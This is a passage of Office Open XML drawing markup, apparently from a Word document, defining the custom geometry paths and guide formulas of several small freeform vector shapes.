                                  <a:gd name="T13" fmla="*/ 8 h 34"/>
                                  <a:gd name="T14" fmla="*/ 16 w 37"/>
                                  <a:gd name="T15" fmla="*/ 0 h 34"/>
                                  <a:gd name="T16" fmla="*/ 31 w 37"/>
                                  <a:gd name="T17" fmla="*/ 4 h 34"/>
                                  <a:gd name="T18" fmla="*/ 37 w 37"/>
                                  <a:gd name="T19" fmla="*/ 13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34">
                                    <a:moveTo>
                                      <a:pt x="37" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="11" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="13"/>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41"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7654" y="4512"/>
                                <a:ext cx="26" cy="22"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 26"/>
                                  <a:gd name="T1" fmla="*/ 9 h 22"/>
                                  <a:gd name="T2" fmla="*/ 20 w 26"/>
                                  <a:gd name="T3" fmla="*/ 17 h 22"/>
                                  <a:gd name="T4" fmla="*/ 15 w 26"/>
                                  <a:gd name="T5" fmla="*/ 22 h 22"/>
                                  <a:gd name="T6" fmla="*/ 5 w 26"/>
                                  <a:gd name="T7" fmla="*/ 22 h 22"/>
                                  <a:gd name="T8" fmla="*/ 0 w 26"/>
                                  <a:gd name="T9" fmla="*/ 13 h 22"/>
                                  <a:gd name="T10" fmla="*/ 0 w 26"/>
                                  <a:gd name="T11" fmla="*/ 4 h 22"/>
                                  <a:gd name="T12" fmla="*/ 5 w 26"/>
                                  <a:gd name="T13" fmla="*/ 0 h 22"/>
                                  <a:gd name="T14" fmla="*/ 20 w 26"/>
                                  <a:gd name="T15" fmla="*/ 0 h 22"/>
                                  <a:gd name="T16" fmla="*/ 26 w 26"/>
                                  <a:gd name="T17" fmla="*/ 9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2">
                                    <a:moveTo>
                                      <a:pt x="26" y="9"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="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342"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7442" y="4551"/>
                                <a:ext cx="114" cy="234"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 36 w 114"/>
                                  <a:gd name="T1" fmla="*/ 39 h 234"/>
                                  <a:gd name="T2" fmla="*/ 46 w 114"/>
                                  <a:gd name="T3" fmla="*/ 35 h 234"/>
                                  <a:gd name="T4" fmla="*/ 52 w 114"/>
                                  <a:gd name="T5" fmla="*/ 13 h 234"/>
                                  <a:gd name="T6" fmla="*/ 67 w 114"/>
                                  <a:gd name="T7" fmla="*/ 13 h 234"/>
                                  <a:gd name="T8" fmla="*/ 52 w 114"/>
                                  <a:gd name="T9" fmla="*/ 48 h 234"/>
                                  <a:gd name="T10" fmla="*/ 52 w 114"/>
                                  <a:gd name="T11" fmla="*/ 74 h 234"/>
                                  <a:gd name="T12" fmla="*/ 67 w 114"/>
                                  <a:gd name="T13" fmla="*/ 78 h 234"/>
                                  <a:gd name="T14" fmla="*/ 72 w 114"/>
                                  <a:gd name="T15" fmla="*/ 56 h 234"/>
                                  <a:gd name="T16" fmla="*/ 88 w 114"/>
                                  <a:gd name="T17" fmla="*/ 30 h 234"/>
                                  <a:gd name="T18" fmla="*/ 98 w 114"/>
                                  <a:gd name="T19" fmla="*/ 48 h 234"/>
                                  <a:gd name="T20" fmla="*/ 52 w 114"/>
                                  <a:gd name="T21" fmla="*/ 108 h 234"/>
                                  <a:gd name="T22" fmla="*/ 57 w 114"/>
                                  <a:gd name="T23" fmla="*/ 134 h 234"/>
                                  <a:gd name="T24" fmla="*/ 72 w 114"/>
                                  <a:gd name="T25" fmla="*/ 108 h 234"/>
                                  <a:gd name="T26" fmla="*/ 98 w 114"/>
                                  <a:gd name="T27" fmla="*/ 74 h 234"/>
                                  <a:gd name="T28" fmla="*/ 108 w 114"/>
                                  <a:gd name="T29" fmla="*/ 78 h 234"/>
                                  <a:gd name="T30" fmla="*/ 57 w 114"/>
                                  <a:gd name="T31" fmla="*/ 160 h 234"/>
                                  <a:gd name="T32" fmla="*/ 52 w 114"/>
                                  <a:gd name="T33" fmla="*/ 199 h 234"/>
                                  <a:gd name="T34" fmla="*/ 77 w 114"/>
                                  <a:gd name="T35" fmla="*/ 152 h 234"/>
                                  <a:gd name="T36" fmla="*/ 114 w 114"/>
                                  <a:gd name="T37" fmla="*/ 113 h 234"/>
                                  <a:gd name="T38" fmla="*/ 98 w 114"/>
                                  <a:gd name="T39" fmla="*/ 143 h 234"/>
                                  <a:gd name="T40" fmla="*/ 88 w 114"/>
                                  <a:gd name="T41" fmla="*/ 165 h 234"/>
                                  <a:gd name="T42" fmla="*/ 98 w 114"/>
                                  <a:gd name="T43" fmla="*/ 190 h 234"/>
                                  <a:gd name="T44" fmla="*/ 108 w 114"/>
                                  <a:gd name="T45" fmla="*/ 199 h 234"/>
                                  <a:gd name="T46" fmla="*/ 88 w 114"/>
                                  <a:gd name="T47" fmla="*/ 216 h 234"/>
                                  <a:gd name="T48" fmla="*/ 77 w 114"/>
                                  <a:gd name="T49" fmla="*/ 234 h 234"/>
                                  <a:gd name="T50" fmla="*/ 46 w 114"/>
                                  <a:gd name="T51" fmla="*/ 225 h 234"/>
                                  <a:gd name="T52" fmla="*/ 31 w 114"/>
                                  <a:gd name="T53" fmla="*/ 203 h 234"/>
                                  <a:gd name="T54" fmla="*/ 26 w 114"/>
                                  <a:gd name="T55" fmla="*/ 165 h 234"/>
                                  <a:gd name="T56" fmla="*/ 46 w 114"/>
                                  <a:gd name="T57" fmla="*/ 78 h 234"/>
                                  <a:gd name="T58" fmla="*/ 31 w 114"/>
                                  <a:gd name="T59" fmla="*/ 39 h 234"/>
                                  <a:gd name="T60" fmla="*/ 0 w 114"/>
                                  <a:gd name="T61" fmla="*/ 4 h 234"/>
                                  <a:gd name="T62" fmla="*/ 15 w 114"/>
                                  <a:gd name="T63" fmla="*/ 4 h 234"/>
                                  <a:gd name="T64" fmla="*/ 31 w 114"/>
                                  <a:gd name="T65" fmla="*/ 1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4" h="234">
                                    <a:moveTo>
                                      <a:pt x="31" y="17"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="69"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="160"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="190"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="152"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="165"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="173"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="190"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="208"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="216"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="77" y="234"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="234"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="216"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="203"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="165"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31"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343"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7566" y="4555"/>
                                <a:ext cx="108" cy="230"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                                  <a:gd name="T1" fmla="*/ 5 h 230"/>
                                  <a:gd name="T2" fmla="*/ 93 w 108"/>
                                  <a:gd name="T3" fmla="*/ 18 h 230"/>
                                  <a:gd name="T4" fmla="*/ 83 w 108"/>
                                  <a:gd name="T5" fmla="*/ 39 h 230"/>
                                  <a:gd name="T6" fmla="*/ 72 w 108"/>
                                  <a:gd name="T7" fmla="*/ 57 h 230"/>
                                  <a:gd name="T8" fmla="*/ 72 w 108"/>
                                  <a:gd name="T9" fmla="*/ 78 h 230"/>
                                  <a:gd name="T10" fmla="*/ 93 w 108"/>
                                  <a:gd name="T11" fmla="*/ 169 h 230"/>
                                  <a:gd name="T12" fmla="*/ 93 w 108"/>
                                  <a:gd name="T13" fmla="*/ 186 h 230"/>
                                  <a:gd name="T14" fmla="*/ 83 w 108"/>
                                  <a:gd name="T15" fmla="*/ 199 h 230"/>
                                  <a:gd name="T16" fmla="*/ 72 w 108"/>
                                  <a:gd name="T17" fmla="*/ 217 h 230"/>
                                  <a:gd name="T18" fmla="*/ 62 w 108"/>
                                  <a:gd name="T19" fmla="*/ 225 h 230"/>
                                  <a:gd name="T20" fmla="*/ 36 w 108"/>
                                  <a:gd name="T21" fmla="*/ 230 h 230"/>
                                  <a:gd name="T22" fmla="*/ 0 w 108"/>
                                  <a:gd name="T23" fmla="*/ 195 h 230"/>
                                  <a:gd name="T24" fmla="*/ 0 w 108"/>
                                  <a:gd name="T25" fmla="*/ 195 h 230"/>
                                  <a:gd name="T26" fmla="*/ 5 w 108"/>
                                  <a:gd name="T27" fmla="*/ 191 h 230"/>
                                  <a:gd name="T28" fmla="*/ 21 w 108"/>
                                  <a:gd name="T29" fmla="*/ 186 h 230"/>
                                  <a:gd name="T30" fmla="*/ 31 w 108"/>
                                  <a:gd name="T31" fmla="*/ 169 h 230"/>
                                  <a:gd name="T32" fmla="*/ 36 w 108"/>
                                  <a:gd name="T33" fmla="*/ 165 h 230"/>
                                  <a:gd name="T34" fmla="*/ 31 w 108"/>
                                  <a:gd name="T35" fmla="*/ 156 h 230"/>
                                  <a:gd name="T36" fmla="*/ 21 w 108"/>
                                  <a:gd name="T37" fmla="*/ 143 h 230"/>
                                  <a:gd name="T38" fmla="*/ 10 w 108"/>
                                  <a:gd name="T39" fmla="*/ 135 h 230"/>
                                  <a:gd name="T40" fmla="*/ 10 w 108"/>
                                  <a:gd name="T41" fmla="*/ 104 h 230"/>
                                  <a:gd name="T42" fmla="*/ 21 w 108"/>
                                  <a:gd name="T43" fmla="*/ 109 h 230"/>
                                  <a:gd name="T44" fmla="*/ 31 w 108"/>
                                  <a:gd name="T45" fmla="*/ 122 h 230"/>
                                  <a:gd name="T46" fmla="*/ 41 w 108"/>
                                  <a:gd name="T47" fmla="*/ 143 h 230"/>
                                  <a:gd name="T48" fmla="*/ 57 w 108"/>
                                  <a:gd name="T49" fmla="*/ 195 h 230"/>
                                  <a:gd name="T50" fmla="*/ 67 w 108"/>
                                  <a:gd name="T51" fmla="*/ 195 h 230"/>
                                  <a:gd name="T52" fmla="*/ 72 w 108"/>
                                  <a:gd name="T53" fmla="*/ 186 h 230"/>
                                  <a:gd name="T54" fmla="*/ 72 w 108"/>
                                  <a:gd name="T55" fmla="*/ 174 h 230"/>
                                  <a:gd name="T56" fmla="*/ 67 w 108"/>
                                  <a:gd name="T57" fmla="*/ 156 h 230"/>
                                  <a:gd name="T58" fmla="*/ 46 w 108"/>
                                  <a:gd name="T59" fmla="*/ 109 h 230"/>
                                  <a:gd name="T60" fmla="*/ 31 w 108"/>
                                  <a:gd name="T61" fmla="*/ 91 h 230"/>
                                  <a:gd name="T62" fmla="*/ 10 w 108"/>
                                  <a:gd name="T63" fmla="*/ 74 h 230"/>
                                  <a:gd name="T64" fmla="*/ 10 w 108"/>
                                  <a:gd name="T65" fmla="*/ 65 h 230"/>
                                  <a:gd name="T66" fmla="*/ 21 w 108"/>
                                  <a:gd name="T67" fmla="*/ 61 h 230"/>
                                  <a:gd name="T68" fmla="*/ 31 w 108"/>
                                  <a:gd name="T69" fmla="*/ 70 h 230"/>
                                  <a:gd name="T70" fmla="*/ 41 w 108"/>
                                  <a:gd name="T71" fmla="*/ 78 h 230"/>
                                  <a:gd name="T72" fmla="*/ 57 w 108"/>
                                  <a:gd name="T73" fmla="*/ 104 h 230"/>
                                  <a:gd name="T74" fmla="*/ 62 w 108"/>
                                  <a:gd name="T75" fmla="*/ 104 h 230"/>
                                  <a:gd name="T76" fmla="*/ 62 w 108"/>
                                  <a:gd name="T77" fmla="*/ 83 h 230"/>
                                  <a:gd name="T78" fmla="*/ 57 w 108"/>
                                  <a:gd name="T79" fmla="*/ 70 h 230"/>
                                  <a:gd name="T80" fmla="*/ 31 w 108"/>
                                  <a:gd name="T81" fmla="*/ 39 h 230"/>
                                  <a:gd name="T82" fmla="*/ 31 w 108"/>
                                  <a:gd name="T83" fmla="*/ 35 h 230"/>
                                  <a:gd name="T84" fmla="*/ 36 w 108"/>
                                  <a:gd name="T85" fmla="*/ 31 h 230"/>
                                  <a:gd name="T86" fmla="*/ 46 w 108"/>
                                  <a:gd name="T87" fmla="*/ 35 h 230"/>
                                  <a:gd name="T88" fmla="*/ 52 w 108"/>
                                  <a:gd name="T89" fmla="*/ 44 h 230"/>
                                  <a:gd name="T90" fmla="*/ 57 w 108"/>
                                  <a:gd name="T91" fmla="*/ 48 h 230"/>
                                  <a:gd name="T92" fmla="*/ 67 w 108"/>
                                  <a:gd name="T93" fmla="*/ 52 h 230"/>
                                  <a:gd name="T94" fmla="*/ 67 w 108"/>
                                  <a:gd name="T95" fmla="*/ 44 h 230"/>
                                  <a:gd name="T96" fmla="*/ 62 w 108"/>
                                  <a:gd name="T97" fmla="*/ 31 h 230"/>
                                  <a:gd name="T98" fmla="*/ 57 w 108"/>
                                  <a:gd name="T99" fmla="*/ 18 h 230"/>
                                  <a:gd name="T100" fmla="*/ 62 w 108"/>
                                  <a:gd name="T101" fmla="*/ 13 h 230"/>
                                  <a:gd name="T102" fmla="*/ 67 w 108"/>
                                  <a:gd name="T103" fmla="*/ 13 h 230"/>
                                  <a:gd name="T104" fmla="*/ 88 w 108"/>
                                  <a:gd name="T105" fmla="*/ 18 h 230"/>
                                  <a:gd name="T106" fmla="*/ 93 w 108"/>
                                  <a:gd name="T107" fmla="*/ 5 h 230"/>
                                  <a:gd name="T108" fmla="*/ 103 w 108"/>
                                  <a:gd name="T109" fmla="*/ 0 h 230"/>
                                  <a:gd name="T110" fmla="*/ 108 w 108"/>
                                  <a:gd name="T111" fmla="*/ 5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8" h="230">
                                    <a:moveTo>
                                      <a:pt x="108" y="5"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="57"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="199"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="217"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="230"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="191"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="165"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="135"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="122"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="186"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="174"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="156"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="109"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="91"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="83"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="70"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="44"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="31"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="67" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="18"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="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344"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7530" y="4772"/>
                                <a:ext cx="57" cy="43"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 57 w 57"/>
                                  <a:gd name="T1" fmla="*/ 43 h 43"/>
                                  <a:gd name="T2" fmla="*/ 0 w 57"/>
                                  <a:gd name="T3" fmla="*/ 43 h 43"/>
                                  <a:gd name="T4" fmla="*/ 5 w 57"/>
                                  <a:gd name="T5" fmla="*/ 34 h 43"/>
                                  <a:gd name="T6" fmla="*/ 10 w 57"/>
                                  <a:gd name="T7" fmla="*/ 21 h 43"/>
                                  <a:gd name="T8" fmla="*/ 26 w 57"/>
                                  <a:gd name="T9" fmla="*/ 0 h 43"/>
                                  <a:gd name="T10" fmla="*/ 31 w 57"/>
                                  <a:gd name="T11" fmla="*/ 0 h 43"/>
                                  <a:gd name="T12" fmla="*/ 31 w 57"/>
                                  <a:gd name="T13" fmla="*/ 0 h 43"/>
                                  <a:gd name="T14" fmla="*/ 36 w 57"/>
                                  <a:gd name="T15" fmla="*/ 4 h 43"/>
                                  <a:gd name="T16" fmla="*/ 57 w 57"/>
                                  <a:gd name="T17" fmla="*/ 21 h 43"/>
                                  <a:gd name="T18" fmla="*/ 57 w 57"/>
                                  <a:gd name="T19" fmla="*/ 34 h 43"/>
                                  <a:gd name="T20" fmla="*/ 57 w 57"/>
                                  <a:gd name="T21"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43">
                                    <a:moveTo>
                                      <a:pt x="57" y="43"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="43"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="21"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="34"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="4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345"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7514" y="4837"/>
                                <a:ext cx="98" cy="8"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 98 w 98"/>
                                  <a:gd name="T1" fmla="*/ 4 h 8"/>
                                  <a:gd name="T2" fmla="*/ 98 w 98"/>
                                  <a:gd name="T3" fmla="*/ 4 h 8"/>
                                  <a:gd name="T4" fmla="*/ 47 w 98"/>
                                  <a:gd name="T5" fmla="*/ 8 h 8"/>
                                  <a:gd name="T6" fmla="*/ 26 w 98"/>
                                  <a:gd name="T7" fmla="*/ 8 h 8"/>
                                  <a:gd name="T8" fmla="*/ 0 w 98"/>
                                  <a:gd name="T9" fmla="*/ 4 h 8"/>
                                  <a:gd name="T10" fmla="*/ 0 w 98"/>
                                  <a:gd name="T11" fmla="*/ 0 h 8"/>
                                  <a:gd name="T12" fmla="*/ 52 w 98"/>
                                  <a:gd name="T13" fmla="*/ 0 h 8"/>
                                  <a:gd name="T14" fmla="*/ 73 w 98"/>
                                  <a:gd name="T15" fmla="*/ 0 h 8"/>
                                  <a:gd name="T16" fmla="*/ 98 w 98"/>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8">
                                    <a:moveTo>
                                      <a:pt x="98" y="4"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="47" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="73" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="98" y="4"/>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346"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7488" y="4863"/>
                                <a:ext cx="161" cy="30"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 161 w 161"/>
